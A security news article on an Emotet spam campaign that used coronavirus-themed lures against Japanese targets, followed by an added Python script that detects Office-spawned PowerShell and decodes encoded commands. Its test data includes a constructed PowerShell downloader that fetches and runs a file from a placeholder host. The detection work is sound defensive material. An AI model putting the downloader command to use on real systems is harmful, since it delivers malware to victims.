Emotet Gang Attempts to Infect Japanese Targets with the Scare of Coronavirus

  • The emails are disguised to look as if they were sent on behalf of disability welfare service providers and public health centers.
  • The scam has been observed in several Japanese prefectures, including Gifu, Osaka, and Tottori.

Researchers observed the notorious Emotet spam operation sending emails camouflaged as official notifications about the coronavirus.

What happened?

A group of researchers reported a malspam campaign disguised as notifications offering more details on preventive measures against coronavirus infection, which is currently an epidemic in China.

  • The emails are disguised to look as if they were sent on behalf of disability welfare service providers and public health centers, to gain the confidence of the readers.
  • The attackers were, in fact, distributing Emotet payloads via malicious document attachments in the emails.
  • The attachments promise to provide preventive measures against coronavirus infection for Japanese citizens.
  • The scam has been observed in several Japanese prefectures, including Gifu, Osaka, and Tottori.

Earlier, the Emotet gang rode on the back of similar trending events: it targeted people with holiday-themed lures for Christmas and Halloween, and used fake invitations to a Greta Thunberg demonstration to lure targets.

How does the coronavirus spam mail work?

Reports from the infosec community suggest that the malspam campaign reused stolen emails from previously compromised accounts as templates in its attempt to infect the recipients. Some experts pointed out that the "Japanese in the subject and file names are strange", and that the emails look more sophisticated than other Emotet distribution attempts.

The IBM X-Force Threat Intelligence team noted that, "The subject of the emails, as well as the document filenames, are similar, but not identical... they are composed of different representations of the current date and the Japanese word for 'notification', in order to suggest urgency."

For added authenticity, some of the email samples also carried in the footer the address of the institution that supposedly sent the coronavirus infection notification.

Objectives of Emotet attacks

Relying mostly on spam emails, Emotet actors try to trick recipients into opening an email attachment which, once opened, downloads and installs the malware.

  • The attachment is a Word document built on Emotet's standard Office 365-styled lure template, which asks the user to click "Enable Content" to view the full document.
  • Clicking it enables macros in Microsoft Office; the macro then runs a PowerShell command that downloads and installs the Emotet payload on the victim's device.
  • The infected host is then used to send further spam to other systems, and Emotet drops additional malware strains such as the TrickBot trojan, which is known for delivering ransomware.
  • Ultimately, the attackers look to harvest user credentials, browser history, and other critical documents.
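The macro-to-PowerShell step above is the point where this chain is easiest to catch on the endpoint. As an added example, not code from the article or from the researchers it cites, the Python below triages a handful of constructed Sysmon-style process-creation events: it flags an Office application spawning a script host, decodes a PowerShell `-EncodedCommand` argument (including the abbreviated `-e`/`-enc` forms PowerShell accepts), and pulls any download URLs out of the decoded script. The event field names, the Office and script-host lists, and the downloader script with its `example.invalid` URL are assumptions for illustration, not indicators from the campaign.

```python
import base64
import re
from pathlib import PureWindowsPath

# Office applications whose child processes deserve scrutiny, and the script
# hosts a malicious macro typically launches (assumed lists, not from the article).
OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe",
                "cscript.exe", "mshta.exe"}

# Constructed downloader modelled on the macro-to-PowerShell step described in
# the article. The host is a placeholder, not a real distribution server.
_FAKE_DOWNLOADER = (
    "$u='http://example.invalid/wp-content/notice.doc';"
    "(New-Object Net.WebClient).DownloadFile($u,$env:TEMP+'\\notice.exe');"
    "Start-Process ($env:TEMP+'\\notice.exe')"
)
# PowerShell's -EncodedCommand takes base64 of the UTF-16LE script text.
_ENCODED = base64.b64encode(_FAKE_DOWNLOADER.encode("utf-16le")).decode("ascii")

# Constructed Sysmon-style process-creation events (not real telemetry):
# a benign Word child, the macro-launched PowerShell, and a user-launched shell.
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "Image": r"C:\Windows\System32\notepad.exe",
     "CommandLine": "notepad.exe"},
    {"ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell -w hidden -e " + _ENCODED},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell Get-Process"},
]


def _basename(path: str) -> str:
    return PureWindowsPath(path).name.lower()


def decode_encoded_command(cmdline: str):
    """Return the decoded script if the command line carries -EncodedCommand
    (or any prefix of it that PowerShell accepts, e.g. -e, -enc), else None."""
    tokens = cmdline.split()
    for flag, value in zip(tokens, tokens[1:]):
        m = re.fullmatch(r"[-/]([A-Za-z]+)", flag)
        if not m:
            continue
        name = m.group(1).lower()
        if not (name.startswith("e") and "encodedcommand".startswith(name)):
            continue
        try:
            return base64.b64decode(value, validate=True).decode("utf-16le")
        except (ValueError, UnicodeDecodeError):
            return None  # flag present but payload is not valid UTF-16LE base64
    return None


def is_office_spawn(event: dict) -> bool:
    """True when an Office application is the parent of a script host."""
    return (_basename(event["ParentImage"]) in OFFICE_APPS
            and _basename(event["Image"]) in SCRIPT_HOSTS)


def triage(events):
    """Return one finding per suspicious event, with the decoded script and
    any URLs found in the raw or decoded command line."""
    findings = []
    for ev in events:
        if not is_office_spawn(ev):
            continue
        script = decode_encoded_command(ev["CommandLine"])
        searchable = ev["CommandLine"] + ("\n" + script if script else "")
        findings.append({
            "parent": _basename(ev["ParentImage"]),
            "child": _basename(ev["Image"]),
            "hidden_window": bool(re.search(r"-w[a-z]*\s+hidden",
                                            ev["CommandLine"], re.I)),
            "decoded_script": script,
            "urls": re.findall(r"https?://[^\s'\"()]+", searchable),
        })
    return findings


if __name__ == "__main__":
    for f in triage(SAMPLE_EVENTS):
        print(f"{f['parent']} -> {f['child']}  hidden_window={f['hidden_window']}")
        print("  decoded:", f["decoded_script"])
        print("  urls:", f["urls"])
```

Run against the samples, only the Word-to-PowerShell event is reported, with the hidden-window flag set and the placeholder download URL recovered from the decoded script; the same parent/child rule, minus the decoding, is what a Sigma or EDR rule for Office-spawned script hosts expresses.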